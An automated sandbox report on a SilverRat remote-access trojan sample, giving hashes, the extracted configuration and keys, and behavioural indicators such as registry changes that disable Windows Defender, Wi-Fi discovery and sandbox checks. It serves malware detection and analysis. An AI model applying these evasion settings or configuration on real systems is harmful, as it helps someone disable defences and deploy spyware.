silverrat | 3fce4b5d26887b84f5f9081fb4b26fc8d8a28bd4e44cc5b7d4f94f1407d4a1e6

Analysis

max time kernel
899s
max time network
437s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
14/03/2025, 19:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Silver Rat.7z
Size

10.5MB
MD5

94306cf12778c76e530c99a79ffbf155
SHA1

78ff9ae383665885d4c484c225e8db093f379273
SHA256

3fce4b5d26887b84f5f9081fb4b26fc8d8a28bd4e44cc5b7d4f94f1407d4a1e6
SHA512

91a4bec7c0cf86c935fa182f1bed613389fa6250675e31d262e2ae2e90b61b4d15f0045c9562615c43bba8e057a7bcd52d98ec06109f935d7e8dce02c0d3b734
SSDEEP

196608:cEqZUYyeiDxFBVwSfSjR4FaVrVqtnBET7erfudD46RqhzXog4pVFArDdUkL3tmmU:cEqN0DzjfiVBqV+ves4aAog4KdUkLFB6

Score

10^/10

silverrat agilenet defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Family

silverrat

Version

1.0.0.0

127.0.0.1:4782

Mutex

SilverMutex_DnlFxUAZJS

Attributes

certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
decrypted_key
-|S.S.S|-
key
yy6zDjAUmbB09pKvo5Hhug==
key_x509
c0V0WlFEZ0xZYlNlSGZLUG1qWnB2aG1IZ3JTUkFP
reconnect_delay
4
server_signature
IqDF2t0tcUeJ45OhGxBEabVCTR+SMe9fy0D2607QNUJafsLMzxQt+lR3DrLHF4kvM18f91T2hryrTJ3/qULM1BIIFaJPuj7jN5fYtRcb1PvD/PN5+O4vIFRPXVNYmQl6sXQQ57yM764zbvOFZAl+zatj35TPt90FnnMOSdB1HTDbxN1bBa1lYQfR9DAWl32/lJl4Sfou/ipWItEgzogtu1Cpt+FLTl5Y2Iu+uqNyra6/hnrh0NvzQaUiWATvdXv2kodONZLOHgtC4WVJy89ISm6QogqCtif0geO+pXcLx6eaZvCyNv8VuKbPV4TlJvuI6bJEYOE5UDCWCsAevqzea6sAHDz09qSNtApThog6jZ6yP4j46athEl76hkcVznFNqzyjHUdXHzWZe1DhaAlZvXhz3DIdNlwZz2lasWBPbSrJUajcq4nhsp6Q4+2Uwhl/eEGeMqECPq7B3yAUCp7wKB3IYSlkEZsFo8TRiJXsEzzv4N7cw9ueeRnWSmaj4sKVB4F955rG3HPYrbZvkviNp/Jm385af6Nyp7q5ZzfD55n/jFcJXZdsuVTXI7FZZh2HalQF+cIQVX9GirHYFZZ3FPxSYZx1vqHbYvmorSkqO0aMu2KBmiJbfUaBjMpLzSd81NXbqglhUecv5xbZHP/366yhuxmhLsOXc3gvw11imhw=

Signatures

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	powershell.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

SilverRat
SilverRat is trojan written in C#.
trojan silverrat
Silverrat family
silverrat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 560 created 696	560	powershell.exe	7

Executes dropped EXE 2 IoCs

pid	Process
2452	SilverRat.exe
5044	SilverClient.exe

Loads dropped DLL 20 IoCs

pid	Process
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe
2452	SilverRat.exe

Obfuscated with Agile.Net obfuscator 4 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/memory/2452-162-0x0000000007180000-0x00000000071CE000-memory.dmp	agile_net
behavioral2/files/0x001900000002b259-161.dat	agile_net
behavioral2/files/0x001900000002b258-171.dat	agile_net
behavioral2/memory/2452-174-0x0000000008D40000-0x0000000008E8E000-memory.dmp	agile_net

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5608	powershell.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\desktop\desktop.ini	SilverClient.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4872	sc.exe
3808	sc.exe
4388	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SilverRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1120	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	SilverRat.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	SilverRat.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 7e003100000000006e5a629e11004465736b746f7000680009000400efbe6d5a718b6e5a639e2e0000002e5702000000010000000000000000003e00000000000bc983004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 19002f433a5c000000000000000000000000000000000000000000	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	SilverRat.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	SilverRat.exe
Key created	\Registry\User\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\NotificationData	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\MRUListEx = 00000000ffffffff	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\NodeSlot = "2"	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0 = 78003100000000006d5a718b1100557365727300640009000400efbec5522d606e5a589e2e0000006c0500000000010000000000000000003a0000000000c9c1fb0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0 = 50003100000000006d5a0092100041646d696e003c0009000400efbe6d5a718b6e5a589e2e00000024570200000001000000000000000000000000000000f5e16100410064006d0069006e00000014000000	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\MRUListEx = ffffffff	SilverRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	SilverRat.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	SilverRat.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	SilverRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	SilverRat.exe
Key created	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	SilverRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2873637269-1458872900-2373203793-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	SilverRat.exe
